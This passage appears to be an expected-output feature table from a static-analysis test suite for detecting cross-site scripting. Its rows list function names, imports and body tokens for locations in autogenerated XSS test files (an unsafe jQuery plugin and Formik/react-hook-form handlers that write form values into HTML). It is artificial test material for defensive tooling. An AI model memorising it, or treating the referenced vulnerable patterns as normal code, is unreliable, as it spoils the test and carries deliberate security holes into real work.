    | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:53:149:60 | ">
    | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:53:149:60 | ">
    | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:53:149:60 | ">
    | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:149:53:149:60 | "> | stringConcatenatedWith | '
    \\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:4:7:20:1 | FormikB ... /div>\\n) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:4:7:20:1 | FormikB ... /div>\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:4:20 | Formik | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:4:20 | Formik | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:4:20 | Formik | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:4:20 | Formik | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:4:20 | Formik | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | 'arguments' object of function FormikBasic | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | 'arguments' object of function FormikBasic | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | 'arguments' object of function FormikBasic | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | 'arguments' object of function FormikBasic | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | 'arguments' object of function FormikBasic | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | () => ( ... /div>\\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | () => ( ... /div>\\n) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | () => ( ... /div>\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | exceptional return of function FormikBasic | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | exceptional return of function FormikBasic | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | exceptional return of function FormikBasic | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | exceptional return of function FormikBasic | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | exceptional return of function FormikBasic | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | return of function FormikBasic | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | return of function FormikBasic | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | return of function FormikBasic | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | return of function FormikBasic | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:4:21:20:1 | return of function FormikBasic | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:4:27:20:1 | (\\n < ... /div>\\n) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:4:27:20:1 | (\\n < ... /div>\\n) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:4:27:20:1 | (\\n < ... /div>\\n) | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:4:27:20:1 | (\\n < ... /div>\\n) | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:4:27:20:1 | (\\n < ... /div>\\n) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:5:5:19:10 |
    \\n ...
    | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:5:5:19:10 |
    \\n ...
    | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:5:5:19:10 |
    \\n ...
    | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:5:5:19:10 |
    \\n ...
    | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:5:5:19:10 |
    \\n ...
    | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:5:6:5:8 | div | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:5:6:5:8 | div | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:5:6:5:8 | div | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:5:6:5:8 | div | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:5:6:5:8 | div | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:5:10:6:8 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:5:10:6:8 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:5:10:6:8 | \\n | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:5:10:6:8 | \\n | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:5:10:6:8 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:6:9:18:17 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:6:9:18:17 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:6:9:18:17 | | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:6:9:18:17 | | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:6:9:18:17 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:6:10:6:15 | Formik | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:6:10:6:15 | Formik | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:6:10:6:15 | Formik | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:6:10:6:15 | Formik | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:6:10:6:15 | Formik | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:25 | initialValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:25 | initialValues | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:25 | initialValues | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:25 | initialValues | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:25 | initialValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:13:7:55 | initial ... : '' }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:28:7:54 | { email ... d: '' } | assignedToPropName | initialValues | +| autogenerated/Xss/XssThroughDom/forms.js:7:28:7:54 | { email ... d: '' } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:28:7:54 | { email ... d: '' } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:7:28:7:54 | { email ... d: '' } | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:28:7:54 | { email ... d: '' } | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:28:7:54 | { email ... d: '' } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:34 | email | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:34 | email | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:34 | email | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:34 | email | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:34 | email | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:30:7:38 | email: '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:37:7:38 | '' | assignedToPropName | email | +| autogenerated/Xss/XssThroughDom/forms.js:7:37:7:38 | '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:37:7:38 | '' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:7:37:7:38 | '' | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:37:7:38 | '' | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:37:7:38 | '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:48 | password | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:48 | password | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:48 | password | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:48 | password | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:48 | password | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:41:7:52 | password: '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:7:51:7:52 | '' | assignedToPropName | password | +| autogenerated/Xss/XssThroughDom/forms.js:7:51:7:52 | '' | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:7:51:7:52 | '' | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:7:51:7:52 | '' | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:7:51:7:52 | '' | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:7:51:7:52 | '' | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:8:20 | validate | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:8:20 | validate | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:8:20 | validate | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:8:20 | validate | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:8:20 | validate | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:13:10:14 | validat ... }} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | contextSurroundingFunctionParameters | ()\n(values) | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:8:28 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | 'arguments' object of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | 'arguments' object of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | 'arguments' object of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | 'arguments' object of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | exceptional return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | exceptional return of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | exceptional return of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | exceptional return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | return of anonymous function | enclosingFunctionBody | div \n Formik initialValues email password validate values $ #id html values foo onSubmit values setSubmitting $ #id html values bar \n inputs form onSubmit handleSubmit \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | return of anonymous function | enclosingFunctionName | FormikBasic | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | values ... } | assignedToPropName | validate | +| autogenerated/Xss/XssThroughDom/forms.js:8:23:10:13 | values ... } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, 